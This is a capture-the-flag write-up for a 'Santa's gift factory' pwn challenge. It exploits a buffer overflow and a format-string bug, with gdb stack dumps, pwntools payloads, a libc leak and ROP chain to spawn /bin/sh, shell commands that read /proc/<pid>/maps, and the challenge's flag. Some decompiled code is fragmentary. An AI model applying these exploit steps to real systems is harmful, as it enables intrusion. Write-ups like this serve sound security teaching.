Level: Hard
Author: Fabi_07
Did you know that Santa has its own factory for making gifts? Maybe you can exploit it to get your own special gift!
This was a typical pwn challenge. We are given a ZIP file that contains a Dockerfile as well as a binary. Checking the security settings on the binary, we see:
> pwn checksec vuln
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
All security mechanisms are enabled except from stack canaries. Next, we take a look at the binary in Ghidra:
void main() {
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
setvbuf(stderr, 0, _IONBF, 0);
printf("Santa's gift factory...");
if (getchr("\nAre you willing to help him (y/n)? "); == 'y') {
} else {
error("I am sorry, but I am unable to help you any further.\n");
void task() {
int red = 0;
int yellow = 0;
int blue = 0;
puts("\nSanta: Great thanks for helping me.");
puts("Santa: Can you count the different Presents and tell me how many of each i need?\n");
for (int i = 0; i < 20; i++) {
int random_value = rand();
random_value %= 3;
if (random_value == 0) {
puts(" - red");
} else if (random_value == 1) {
puts(" - yellow");
} else if (random_value == 2) {
puts(" - blue");
int answer_red = 0;
int answer_yellow = 0;
int answer_blue = 0;
printf("\nSanta: How many red presents are needed?\n > ");
printf("Santa: And how many yellow presents are needed?\n > ");
printf("Santa: And how many blue presents are needed?\n > ");
if (red == answer_red && yellow == answer_yellow && blue == answer_blue) {
puts("\nSanta: Well done, now you may get the flag.");
} else {
puts("Santa: Sorry, but I think there has been a mistake. I\'m afraid I can\'t give you the flag just yet.\n");
void tellflag() {
FILE *flag = fopen("flag","r");
if (flag == (FILE *)0x0) {
error("Opening flag file failed!!! Please contact the admins.");
char flag_text [6];
size_t read = fread(flag_text, 1, 5, flag);
flag_text[read] = 0;
if (fclose(flag) < 0) {
error("Closing flag file failed!!! Please contact the admins.");
char* name = getstr("Santa: One last thing, can you tell me your name?");
printf("\nSanta: Let me see. Oh no, this is bad, the flag vanished before i could read it entirely . All I can give you is this: %s. I am very sorry about this and would like to apologise for the inconvenience.\n",flag_text);
char anything_else [136];
gets("\nSanta: Can I assist you with anything else?", anything_else);
printf("\nSanta: You want me to help you with ");
puts("?\nSanta: I will see what I can do...");
The code is quite straight-forward. First, we are asked to solve a simple puzzle and then tellflag
is called.
The function first opens the flag
file, reads it into a buffer and inserts a zero termination after the fifth
character. Then, magic.sh
is called which deletes the flag
file so that we cannot simply get a shell and read the
The two vulnerabilities in this binary are a buffer overflow as well as a format string vulnerability:
char anything_else [136];
gets("\nSanta: Can I assist you with anything else?", anything_else); // buffer overflow
printf("\nSanta: You want me to help you with ");
printf(anything_else); // format string vulnerability
Note that the gets
function is a custom implementation:
char * gets(char *text,char *destination) {
printf("%s\n > %s",text,"\x1b[?25h");
char* line = (char*) 0x0;
size_t size = 0;
ssize_t read = getline(&line, &size, stdin);
memcpy(destination,line,read - 1);
return destination;
Since magic.sh
deletes the flag
file the content of flag
needs to be buffered somewhere in memory. This is a bit
confusing since fread
is supposed to only read 5 bytes, but it turns out that the fread
implementation of libc reads
4096 bytes instead (can be verified using strace
All we need a way to read memory either from stack or from the heap. At this point I came up with two solutions. The first one is a simple, clean and unintended one and the second one is a bit messy and hacky but intended. I will describe both solutions.
We have a buffer overflow as well as a format string vulnerability. What if I told you: we can manipulate a pointer on
the stack through the buffer overflow, as well as print that particular pointer with just one input? That's exactly
what we can do here. We start by generating a template via pwn template
and solving the puzzle. We then attach gdb
and check the stack right before the last printf
0x00005641a15565ca <+254>: lea rax,[rbp-0xa0]
0x00005641a15565d1 <+261>: mov rdi,rax
0x00005641a15565d4 <+264>: mov eax,0x0
0x00005641a15565d9 <+269>: call 0x5641a1556180 <printf@plt>
> break *tellflag+269
> c
> stack 50
00:0000│ rsp 0x7fff328dd0f0 ◂— 0xa68 /* 'h\n' */
01:0008│-0a8 0x7fff328dd0f8 ◂— 0x7b33325648bf70
02:0010│ rdi 0x7fff328dd100 ◂— 0x41 /* 'A' */
03:0018│-098 0x7fff328dd108 ◂— 0x1
04:0020│-090 0x7fff328dd110 ◂— 0xa /* '\n' */
05:0028│-088 0x7fff328dd118 —▸ 0x7fcbae941780 (_IO_2_1_stdout_) ◂— 0xfbad2887
06:0030│-080 0x7fff328dd120 —▸ 0x5641a1559020 (stdout@GLIBC_2.2.5) —▸ 0x7fcbae941780 (_IO_2_1_stdout_) ◂— 0xfbad2887
07:0038│-078 0x7fff328dd128 —▸ 0x7fcbae93d600 (_IO_file_jumps) ◂— 0x0
08:0040│-070 0x7fff328dd130 —▸ 0x7fcbae99b000 (_rtld_global) —▸ 0x7fcbae99c2d0 —▸ 0x5641a1555000 ◂— 0x10102464c457f
09:0048│-068 0x7fff328dd138 —▸ 0x7fcbae7edbc9 (_IO_do_write+25) ◂— cmp rbx, rax
0a:0050│-060 0x7fff328dd140 —▸ 0x7fcbae941780 (_IO_2_1_stdout_) ◂— 0xfbad2887
0b:0058│-058 0x7fff328dd148 —▸ 0x7fcbae7ee053 (_IO_file_overflow+259) ◂— cmp eax, -1
0c:0060│-050 0x7fff328dd150 ◂— 0x2c /* ',' */
0d:0068│-048 0x7fff328dd158 —▸ 0x5641a1557378 ◂— '\nSanta: Well done, now you may get the flag.'
0e:0070│-040 0x7fff328dd160 —▸ 0x7fcbae941780 (_IO_2_1_stdout_) ◂— 0xfbad2887
0f:0078│-038 0x7fff328dd168 —▸ 0x7fcbae7e2cfa (puts+506) ◂— cmp eax, -1
10:0080│-030 0x7fff328dd170 —▸ 0x7fff328dd318 —▸ 0x7fff328de2b3 ◂— 'COLORFGBG=15;0'
11:0088│-028 0x7fff328dd178 —▸ 0x7fcbae7add14 (random+52) ◂— xor eax, eax
12:0090│-020 0x7fff328dd180 —▸ 0x7fff328dd308 —▸ 0x7fff328de294 ◂— '/home/kali/Downloads/hv16/vuln'
13:0098│-018 0x7fff328dd188 —▸ 0x5641a30e2480 ◂— 0x6b61667b33320000
14:00a0│-010 0x7fff328dd190 ◂— 0x500000000
15:00a8│-008 0x7fff328dd198 —▸ 0x5641a30e22a0 ◂— 0x5641a30e2
Near the bottom of the stack (higher addresses) we can see a pointer to the heap 0x5641a30e2480
(the color of the
address reveals the fact that it points to the heap). Looking at the content on the heap:
> x/10s 0x5641a30e2480
0x5641a30e2480: ""
0x5641a30e2481: ""
0x5641a30e2482: "23{fake_flag}\n"
0x5641a30e2491: ""
0x5641a30e2492: ""
Seems like we simply need to change the 80
to 82
to be able to influence the pointer. Luckily, our buffer overflow
does not append any special characters. To find the correct offset, we can send a cyclic string and then observe what
was written at offset 13 onto the stack:
> stack 50
pwndbg> stack 50
00:0000│ rsp 0x7ffe483076d0 ◂— 0xa68 /* 'h\n' */
01:0008│-0a8 0x7ffe483076d8 ◂— 0x7b333256486f70 /* 'poHV23{' */
02:0010│ rdi 0x7ffe483076e0 ◂— 0x6161616261616161 ('aaaabaaa')
03:0018│-098 0x7ffe483076e8 ◂— 0x6161616461616163 ('caaadaaa')
04:0020│-090 0x7ffe483076f0 ◂— 0x6161616661616165 ('eaaafaaa')
05:0028│-088 0x7ffe483076f8 ◂— 0x6161616861616167 ('gaaahaaa')
06:0030│-080 0x7ffe48307700 ◂— 0x6161616a61616169 ('iaaajaaa')
07:0038│-078 0x7ffe48307708 ◂— 0x6161616c6161616b ('kaaalaaa')
08:0040│-070 0x7ffe48307710 ◂— 0x6161616e6161616d ('maaanaaa')
09:0048│-068 0x7ffe48307718 ◂— 0x616161706161616f ('oaaapaaa')
0a:0050│-060 0x7ffe48307720 ◂— 0x6161617261616171 ('qaaaraaa')
0b:0058│-058 0x7ffe48307728 ◂— 0x6161617461616173 ('saaataaa')
0c:0060│-050 0x7ffe48307730 ◂— 0x6161617661616175 ('uaaavaaa')
0d:0068│-048 0x7ffe48307738 ◂— 0x6161617861616177 ('waaaxaaa')
0e:0070│-040 0x7ffe48307740 ◂— 0x6261617a61616179 ('yaaazaab')
0f:0078│-038 0x7ffe48307748 ◂— 0x6261616362616162 ('baabcaab')
10:0080│-030 0x7ffe48307750 ◂— 0x6261616562616164 ('daabeaab')
11:0088│-028 0x7ffe48307758 ◂— 0x6261616762616166 ('faabgaab')
12:0090│-020 0x7ffe48307760 ◂— 0x6261616962616168 ('haabiaab')
13:0098│-018 0x7ffe48307768 ◂— 0x6261616b6261616a ('jaabkaab')
Now we can use this string to find the correct offset:
cyclic_find(b'jaabkaab') # 136
Perfect, now we just need the right offset to print the string. We can figure out the right one by just trying a few:
for i in range(50):
io = process([exe.path])
io.sendline(b'%' + str(i).encode() + b'$p')
print(i, io.recvline())
from which we get the right offset 25
at which we can see XXXXXXXXX480
0 b'Santa: You want me to help you with %0$p?\n'
1 b'Santa: You want me to help you with 0x7ffd69f0c2a0?\n'
2 b'Santa: You want me to help you with (nil)?\n'
3 b'Santa: You want me to help you with (nil)?\n'
4 b'Santa: You want me to help you with 0x78?\n'
5 b'Santa: You want me to help you with 0x80?\n'
6 b'Santa: You want me to help you with 0xa68?\n'
7 b'Santa: You want me to help you with 0x7b33325648ef70?\n'
8 b'Santa: You want me to help you with 0x70243825?\n'
9 b'Santa: You want me to help you with 0x1?\n'
10 b'Santa: You want me to help you with 0xa?\n'
11 b'Santa: You want me to help you with 0x7f98be1b2780?\n'
12 b'Santa: You want me to help you with 0x556dbbf5c020?\n'
13 b'Santa: You want me to help you with 0x7f7fa531c600?\n'
14 b'Santa: You want me to help you with 0x7f526af10000?\n'
15 b'Santa: You want me to help you with 0x7f17863b5bc9?\n'
16 b'Santa: You want me to help you with 0x7f705c48d780?\n'
17 b'Santa: You want me to help you with 0x7f28a1559053?\n'
18 b'Santa: You want me to help you with 0x2c?\n'
19 b'Santa: You want me to help you with 0x565253965378?\n'
20 b'Santa: You want me to help you with 0x7fdbd3d2a780?\n'
21 b'Santa: You want me to help you with 0x7f9227980cfa?\n'
22 b'Santa: You want me to help you with 0x7fffc7b78248?\n'
23 b'Santa: You want me to help you with 0x7f265243cd14?\n'
24 b'Santa: You want me to help you with 0x7ffe606647b8?\n'
25 b'Santa: You want me to help you with 0x564072241 480?\n'
The final exploit now looks like this:
payload = fit({0: b'%25$s', 136: b'\x84'})
This works by:
- First, overwriting the pointer from
which is the content of the flag. - Printing the 25th variable on the stack which is this exact pointer.
The full unintended exploit can be found in exploit_unintended.py.
For this solution, we first leak a libc address via the string format vulnerability and jump back into tellflag
the buffer overflow:
payload = flat({0: b'%p' * 50, 167: chr(0x9b).encode()}) # jump back into task
leak = str(io.recvline()).split('0x')
leak_task = int(leak[27], 16)
leak_libc = int(leak[37].replace('(nil)', ''), 16)
exe.address = leak_task - (exe.sym['task'] + 427)
libc.address = leak_libc - libc.sym['__libc_start_main'] + 0x30
With this we have defeated ASLR. The exact offsets that I used above can be found using GDB. Next, we get a remote shell:
rop = ROP(libc)
ret = rop.find_gadget(['ret'])
binsh = next(libc.search(b'/bin/sh\x00'))
With this we get a remote shell but keep in mind that the flag
file has already been deleted at this point. Instead,
we take a peek at /proc/<pid>/maps
to identify the base of the heap:
io.sendline(b"PID=$(ps -ef | grep -e vuln | grep -v grep | grep -v socat | tr -s ' ' | cut -d ' ' -f2)")
io.sendline(b"echo ${PID}")
io.sendline(b"cat /proc/${PID}/maps | grep heap")
All we have to do now, is to calculate the address on the heap that contains the actual flag content (the offset is always the same):
heap_addr = io.recvline().decode()
heap_addr = int(heap_addr.split('-')[0], 16)
heap_addr = heap_addr + 0x485
And now we can finally print the flag file content:
rop = ROP(libc)
The complete intended solution can be found in exploit_intended.py and the flag
was HV23{roses_are_red_violets_are_blue_the_bufferoverfl0w_is_0n_line_32}